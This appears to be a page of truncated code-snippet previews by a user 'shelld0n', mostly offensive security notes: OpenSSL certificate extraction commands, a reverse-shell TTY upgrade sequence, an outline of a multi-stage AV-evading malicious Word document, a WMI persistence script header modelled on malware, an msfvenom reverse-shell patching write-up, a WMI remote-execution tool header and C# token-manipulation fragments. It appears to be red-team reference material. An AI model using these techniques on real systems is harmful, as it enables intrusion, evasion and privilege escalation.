shelld0n

 Extraire la chaine de certification client du p12

openssl pkcs12 -in -cacerts -nokeys -chain -out
Extraire le certificat client

openssl pkcs12 -in -clcerts -nokeys -out
Extraire lma clée privée chiffrée du client

openssl pkcs12 -in yourP12File.pfx -nocerts -out privateKey.pem
Importer le certificat PEM dans le truststore des brokers kafka (Un Ajout pour chaque certificat dans la chaine)

shelld0n

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset

shelld0n

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

• using OLE event autorun method
• removing it's pretext shapes
• Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
• Leveraging certutil technique to receive Base64 encoded malicious HTA document
• Having Base64 encoded Powershell command in that Author property

shelld0n

'
' SYNOPSIS:
' 	WMI Persistence method as originally presented by SEADADDY malware
'		(https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' 	and further documented by Matt Graeber.
'
' 	The scheduled command will be launched after roughly 3 minutes since system 
' 	gets up. Also, even if the command shall spawn a window - it will not be visible,
' 	since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'

shelld0n

Looking for WaitForSingleObject call within modern msfvenom generated payload.

---

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

shelld0n

#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin) 
# account, not SYSTEM, plus, it doesn't generate noisy messages

shelld0n

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;

namespace Token
{
    class Program

shelld0n

Get-Process -IncludeUserName | Where-Object {$_.USERNAME -Like '*SYSTEM*'} | select ProcessName, Id, Handles

shelld0n

// Luid Structure Definition
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public Int32 HighPart;
}

[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES

shelld0n

// see https://www.pinvoke.net/default.aspx/advapi32.openprocesstoken
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY = 0x0008;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;